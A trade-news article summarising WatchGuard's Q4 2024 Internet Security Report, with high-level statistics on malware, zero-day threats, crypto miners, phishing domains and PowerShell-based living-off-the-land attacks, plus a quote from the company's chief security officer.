Digital Newsletter
Each week our editor Phil Alsop rounds up the most popular articles, videos and expert opinions. We compile this into a Digital Newsletter and send it straight to your inbox every week.
Digital Magazines
We'll let you know each time a new edition of MSP Channel Insights is released so that you're always kept up-to-date with the latest and greatest news and press releases.
Video Magazines
The MSP Channel Insights Video magazine contains the latest Zoom interviews with experts in the industry.
WatchGuard Technologies has released the findings of its latest Internet Security Report, a quarterly analysis detailing the top malware, network, and endpoint security threats observed by the WatchGuard Threat Lab researchers during the fourth quarter of 2024.
The report’s key findings include a 94% (quarter-over-quarter) increase in network-based malware detections, reflecting a steady rise in threats. At the same time, the data shows an increase in all malware detections, including a 6% increase in Gateway AntiVirus (GAV) detections and a 74% increase in Advanced Persistent Threat (APT) Blocker detections, the most significant rises came from proactive machine learning detection offered by IntelligentAV (IAV) at 315%, indicating the growing role in more proactive anti-malware services catching sophisticated, evasive malware, like zero-day malware, when it comes from encrypted channels. The significant upticks in evasive hits suggest attackers are leaning harder into obfuscation and encryption, challenging traditional defences.
The Threat Lab also observed a significant increase in crypto miner detection at 141% quarter over quarter. Cryptocurrency mining is a natural process for acquiring cryptocurrency on some blockchains, including Bitcoin. A malicious coin miner can look like executing software that installs a coin miner without the user’s knowledge or consent. As the price and popularity of Bitcoin go up, crypto miner detections also stand out as a malicious tactic used by threat actors.
“The findings from our Q4 2024 Internet Security Report reveal a cybersecurity landscape where attackers are both continuously relying on old habits and low-hanging fruit vulnerabilities and flaws that are easy to exploit while also leveraging evasive malware techniques to evade traditional defences,” said Corey Nachreiner, chief security officer at WatchGuard Technologies. “The data illustrates the importance of staying vigilant with the basics: proactively keep systems updated, monitor for abnormal activity, and use layered defences to catch the inevitable exploit attempts across networks and endpoints. By doing so, businesses can greatly mitigate the threats demonstrated this quarter and be prepared for what adversaries and the evolving threat landscape may bring.”
Additional key findings from WatchGuard’s Q4 2024 Internet Security Report include:
In Q4, Zero-Day malware rebounded to 53%, up significantly from its all-time low of 20% in Q3. This reinforces the report’s earlier observation that malware increasingly comes in encrypted connections, with these encrypted channels typically delivering more sophisticated and evasive threats.
Total unique malware threats are significantly down for the quarter, at a historic 91% decrease. This is likely due to a reduction in one-off targeted attacks and an increase in generic malware. However, fewer threats do not mean that the threats that attempt to slip through defences will be simple attacks if not addressed quickly and diligently.
Network attacks declined 27% from the previous quarter. The Threat Lab findings show that many tried-and-true exploits persisted as top attacks this quarter, underscoring that attackers stick with what they know works.
The top phishing domains list remained unchanged from the previous quarter, highlighting the continued use of persistent and high-impact phishing infrastructure. The SharePoint-themed phishing domains, which often mimic legitimate login portals to harvest credentials, suggest that attackers still exploit business email compromise (BEC) tactics to target organisations relying on Office 365 services.
Living off-the-land attacks (LotL), which exploit legitimate system tools like PowerShell, Windows Management Instrumentation (WMI), or Office macros instead of relying on external malware to load malware, are trending. This can be seen in 61% of endpoint attack techniques leveraging PowerShell injection and scripts, accounting for nearly 83% of all endpoint attack vectors. Of that ~83%, 97% were from PowerShell, again pointing to PowerShell being responsible for the vast majority of threat actors’ avenues of attack.
Over half of the top 10 network detections are generic signatures, which catch common web app flaws. This trend underscores that attackers are going after the “bread and butter” style attacks in mass.
Consistent with WatchGuard’s Unified Security Platform® approach and the WatchGuard Threat Lab’s previous quarterly research updates, the data analysed in this quarterly report is based on anonymised, aggregated threat intelligence from active WatchGuard network and endpoint products whose owners have opted to share in direct support of WatchGuard’s research efforts.
